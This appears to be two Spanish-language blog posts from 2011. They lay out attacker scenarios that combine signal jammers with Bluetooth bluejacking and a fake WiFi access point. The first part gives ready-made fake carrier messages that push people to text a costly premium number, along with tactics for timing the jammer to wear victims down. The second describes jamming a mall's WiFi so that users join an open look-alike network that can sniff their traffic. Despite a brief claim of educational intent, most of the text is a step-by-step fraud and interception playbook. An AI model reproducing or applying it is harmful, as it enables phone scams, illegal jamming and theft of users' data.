Ahora con un sistema de administracion Bluetooth, ya sea un Smartphone con una APP especifica o lo mas recomendable una PC CON BLUETOOTH vamos a analizar todos los dispositivos activos en ese sector para proceder a enviar nuestro “SMS Señuelo”.

La pregunta sera..como enviare el SMS si el GSM esta inactivo en esa zona, y peor aun no se los numeros!!??

Primero que nada el GSM esta inactivo, bien dicho!… pero la señal bluetooth no
segundo, realmente no enviaremos un SMS asi que no necesitaremos numero telefonico, haremos uso de la tecnica Bluejacking!

Termino Bluejacking:
En seguridad informática, el término bluejacking se refiere a una técnica consistente en enviar mensajes no solicitados entre dispositivos Bluetooth, como por ejemplo teléfonos móviles, PDAs o portátiles. La tecnología Bluetooth tiene un alcance limitado de unos 10 metros normalmente en dispositivos pequeños (como teléfonos móviles) aunque otros aparatos más grandes (como portátiles) con transmisores más potentes pueden alcanzar los 100 metros. (Segun wikipedia)
———————————————————————————

Mientras analizamos los dispositivos activos bluetooth debemos ver y coordinar los MTS a la redonda ademas de ver que dispositivos son los que podrian recibir los “SMS Arbirtrarios”.

Una vez obtenido nuestra lista de objetivos y puntos clave para que reciban nuestro señuelo, debemo armar nuestra LETTER Corporativa la cual contendra el Numero de nuestro servicio.

Letter corporativa de Ejemplo:

Sr usuario la señal de su dispositivo movil se ha desactivado por inconvenientes, esta sera habilitada dentro de las proximas 72 hrs, si su linea es de vital importancia debido a su ocupacion, puede restaurarla enviando un SMS con la palabra RESTAURAR al 6666

——————————————————————————

Nota: donde 6666 es nuestro numero de servicio SMS el cual es de un costo altisimo…
——————————————————————————-

Una vez enviado los SMS SEÑUELO a todos los de nuestra lista de objetivos a la redonda, estos o algunos.. intentaran la restauracion de su servicio.

La pregunta ahora es… serà que van a caer?

Primero que todo pensemos… El escenario del Puesto de llamadas fue planteado por las siguientes razones…

1- Si el encargado tiene su bluetooth activado y recibe esto que pasa?

a-casi un 90 % seguro que lo hace, por que su ocupacion esta siendo suspendida la cual le generaria perdidas…

b- la multitud de gente en espera lo pone en un momento de poco pensar y de mucho hacer, asi que la solucion esta en el sms que se le envio y asi podra seguir y dejar a sus clientes satisfechos

2- Que pasa si el encargado no esta con bluetooth activo?
a- para eso dige que hay que sacar la lista de objetivos…por que de seguro muchos tienen llamadas importantes que hacer y no dudaran ni un min para hacer un pronto reestablecimiento de su servicio.

——————————————————————————-

Una vez que estos reciban los SMS señuelos debemos apagar nuestro inhibidor por unos segundos, muy recomendable unos 30 Seg… y enviar un nuevo SMS que diga..

Letter Ejemplo 2:
———————————————————————————-
Su servicio esta en mantenimiento y se generara una intermitencia en su señal, si desea restaurar su servicio lo mas pronto posible, favor enviar un SMS con la palabra RESTAURAR al numero 6666.

———————————————————————————-
Se desactiva el inhibidor….

Rectificando mucho el atacante en su Servicio de SMS podria notar si aun los dispositvos objetivos no han dado respuesta…cuando este note si se ha logrado captar una gran suma.. ya deberia dejar de activar su inhibidor y dejar todo estable.

Nota: El estado de intermitencia de un inhibidor se hace con el objetivo de persistir y que se haga mas tedioso para los usuarios.. con el fin de que su desespero los haga tratar de restablecer su servicio lo mas pronto posible mediante las instrucciones que se le dieron en el sms.

Conclusion: Este articulo fue creado desde la perspectiva de un atacante malicioso, sin ningun motivo de orientar al robo y con la simple gracia de enseñar y notificar las infinidades de tecnicas que se pueden usar en este “Escenario” tan inseguro!

Inhibidores de Señal [El escenario perfecto] [WIFI]

MaztoR — Fri, 09 Dec 2011 06:07:11 +0000

[Bueno debido a mi ausencia durante unas semanas, surge este articulo que lo dividire en 2, segun los tipos de señales que explicaré (WIFI, GSM).]

Este articulo se me ocurrio hacerlo por un “Recuerdo de viejos tiempos”; la ausencia que tuve estos dias fue debido a mi traslado de apartamento, viendo en el trasteo las cosas viejas que tenia… logre notar una pequeña caja negra pegada con cinta y hecha con un esquema demasiado rustico!!

Pero que era exactamente esa pequeña caja negra?

Esta pequeña caja era un INHIBIDOR DE SEÑAL que fue el resultado de unas pocas clases de electronica que habia tomado un compañero. Era demasiado rustico y no carecia de una funcionalidad excelente debido a que era casera y no se tenian unos masteriales de alta calidad, pero te preguntaras…

Que es un inhibidor o perturbador de señal?

Segun wikipedia

En Telecomunicación, un perturbador, también denominado inhibidor es un Dispositivo electrónico que impide o dificulta las transmisiones radioeléctricas en un determinado rango de frecuencias mediante la emisión de una señal de mayor potencia que la del emisor que quiere transmitir.

Se compone básicamente de un generador de señal y un transmisor. El primero genera una señal que es enviada a través del segundo con una potencia determinada según la necesidad. Esta señal carece de información útil, únicamente es una señal generada por un oscilador o generador de onda. Ésta, al emitirse con mayor potencia que los sistemas de transmisión a interferir, las suprime, evitando que emisor y receptor establezcan la comunicación.

Se utiliza principalmente por motivos de seguridad o con intenciones de sabotaje.

————————————————————————–

Segun MaztoR

Dispositivo que no permite un transcurso de señal, impidiendo, dificultando y/o creando difusion en el receptor por que esta ocupa esa frecuencia con otra señal mucho mas potente. (corregirme si estoy mal)

————————————————————————–

Bueno iniciemos la objetividad de este articulo…

ya sabemos perfectamente que es un Inhibidor de señal (si no te quedo claro para eso esta google XD) pero ahora debemos plantear un “ESCENARIO PERFECTO” desde la perspectiva de un “Atacante Malicioso” la cual consta de reemplazos o sustituciones de puntos de acceso para asi el atacante obtener un “beneficio” y una administracion de conexiones o host vibrantes en el punto “CLON” que logicamente sera el que nosotros pondremos de señuelo.

primero que nada cabe hay que aclarar ciertos puntos:

1- Un inhibidor tiene un rango de X MTS/KMTS definidos a la redonda (todo depende del tipo de inhibidor)

2- Aqui se planteara un escenario usando inhibidores portables y de poco alcance (ya sabran el porque)

Primer Escenario… [El Centro Comercial]
————————————————-

Bueno viendo bien el grafico se puede notar que lo que hacemos es dejar a un cierto grupo de personas sin recepcion de señal y creando un nuevo punto de acceso con un nombre COPIA para hacer confusion en los usuario, copn el objetivo de que intente un reconexion buscando en su lista de detectados (logico no saldra nada por que la zona esta inhibida) pero dejamos el inhibidor unos 10 min para que los usuarios pierdan la total conexion WIFI por que si lo hacemos en fraccion de segundos no habria desconexion debido a que hace reconexion simultanea, al estar seguros de una desconexion total desactivamos el inhibidor y hacemos que nuestro punto de acceso este lo mas cerca posible con el objetivo de que elijan el punto “CLON” con mas señal, osea el de nosotros por la cercania no les parece?….

Nota: hay muchas formas de hacer puntos de acceso, te doy algunas ideas… usando tus Dispositivos Iphone, ipad por la portabilidad, con portatiles + modems etc.

Bueno ya teniendo un punto de acceso propio podemos hacer una administracion de nuestros host activos, pudiendo interceptar su trafico, sniffearlos o como le quieras hacer

Ahora te preguntaras.. no es mas facil conectarse al punto principal (original) y evitar todo este proceso?

Veamos no escribo cosas por nada jajaja, que tal si la clave no la sabemos?

Repuesta
creamos el punto de acceso sin clave y que sea CLON, para una conexion mas directa para los usuarios.. por que si le ponemos clave… ellos no la sabria debido a que pondrian la clave que ellos saben, pero como no la sabemos hay perdida…

De que sirve si las pcs pueden tener palomeada la opcion de “Conectarse automaticamente”

Respuesta

Simple con ingenio se logra que conecten al punto “CLON”.. haber te doy una idea..

PUNTO ORIGINAL LLAMADO= CENTROCOMERCIAL
PUNTO CLON LLAMADO= CENTROCOMERCIAL ESTABLE

ponemos el inhibidor en intermitencia para que haga una especie de prendido/apagado y los usuarios tengan una pesima señal… asi que veran el punto de wifi “ESTABLE”
y decidiran usarlo (Este se prueba en intervalos para no perjudicar las conexiones a nuestro punto de acceso)

Este es realmente un Escenario perfecto?

La segunda parte tratara sobre inhibidores de señal telefonica GSM, Saludos y happy Attack?